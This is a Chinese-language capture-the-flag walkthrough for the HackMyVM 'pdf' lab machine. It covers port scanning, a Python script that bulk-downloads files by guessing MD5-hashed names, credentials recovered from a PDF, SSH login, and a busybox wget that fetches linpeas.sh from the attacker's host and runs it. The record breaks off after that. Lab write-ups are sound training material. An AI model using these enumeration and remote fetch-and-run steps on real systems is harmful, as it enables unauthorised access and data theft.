pdf

靶机地址：https://hackmyvm.eu/machines/machine.php?vm=pdf

10.213.193.65

信息搜集

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.213.193.65                                                        [16:23:15]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.213.193.65:22
Open 10.213.193.65:80
Open 10.213.193.65:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-09 16:23 CST
Initiating ARP Ping Scan at 16:23
Scanning 10.213.193.65 [1 port]
Completed ARP Ping Scan at 16:23, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:23
Completed Parallel DNS resolution of 1 host. at 16:23, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:23
Scanning 10.213.193.65 [3 ports]
Discovered open port 22/tcp on 10.213.193.65
Discovered open port 8080/tcp on 10.213.193.65
Discovered open port 80/tcp on 10.213.193.65
Completed SYN Stealth Scan at 16:23, 0.02s elapsed (3 total ports)
Nmap scan report for 10.213.193.65
Host is up, received arp-response (0.00056s latency).
Scanned at 2026-01-09 16:23:22 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:6A:E2:AE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

‍

80端口扫描

存在hint提示路由

答案是42

‍

8080端口

8080端口是一个文件管理系统，需要token，尝试42发现可以登录进去

可以看到是通过/view/?filename=md5(文件名)

拿了他给的示例md5破解了一下发现是1

https://www.cmd5.com/default.aspx

然后又尝试加密md(2)发现也是可以获取pdf的。最高到100

写个python脚本批量获取pdf

import requests
import hashlib
import os 


def download_pdfs():
    # 基础配置
    base_url = "http://10.213.193.65:8080/view/?filename="
    cookies = {'session_token': '42'}

    # 创建output目录（不存在则创建，存在则不报错）
    output_dir = "output"
    os.makedirs(output_dir, exist_ok=True)

    # 遍历1-99下载PDF
    for num in range(1, 100):
        md5 = hashlib.md5(str(num).encode()).hexdigest()
        file_name = f"{num}.pdf"
        # 拼接完整的保存路径（output/文件名）
        save_path = os.path.join(output_dir, file_name)

        try:
            resp = requests.get(f"{base_url}{md5}.pdf", cookies=cookies, timeout=10)
            if resp.status_code == 200:
                with open(save_path, 'wb') as f:
                    f.write(resp.content)
                print(f"成功: {save_path}")
            else:
                print(f"失败[{resp.status_code}]: {file_name}")
        except Exception as e:
            print(f"异常[{file_name}]: {str(e)}")


if __name__ == "__main__":
    download_pdfs()
    print("下载完成")

你会发现在window中都是2kb(默认显示 “2 KB”，是把字节数 ÷1024 后取整（2048÷1024=2，2080÷1024≈2.03，仍显示 2）)，分辨不出来区别，但是Linux显示的是原始字节数不会自动换算成 KB/MB

使用awk排序

1	ls -l *.pdf \| awk '{print $5, $9}' \| sort -nr

最大的是57.pdf，经过详细查看发现了用户名和密码

welcome:lamar57

提权

user flag

root@LAPTOP-O235O5EH [~/Desktop/baji/HackMyVM/pdf/output] ➜  ssh welcome@10.213.193.65                                                                            [17:12:56]
The authenticity of host '10.213.193.65 (10.213.193.65)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:5: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.213.193.65' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
welcome@10.213.193.65's password:
Linux pdf 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
welcome@pdf:~$
welcome@pdf:~$
welcome@pdf:~$
welcome@pdf:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for welcome:
sudo: a password is required
welcome@pdf:~$
welcome@pdf:~$
welcome@pdf:~$
welcome@pdf:~$ ls
user.txt
welcome@pdf:~$ cat user.txt
flag{user-8d8b7d129eff7655df8d68bc7c23bfde}
welcome@pdf:~$

‍

root flag

上传linpeas扫描

welcome@pdf:~$ busybox wget http://10.213.193.63:9999/linpeas.sh
Connecting to 10.213.193.63:9999 (10.213.193.63:9999)
linpeas.sh           100% |*****************************************************************************************************************************|  952k  0:00:00 ETA
welcome@pdf:~$ ls
linpeas.sh  user.txt
welcome@pdf:~$ chmod +x linpeas.sh
welcome@pdf:~$ ./linpeas.sh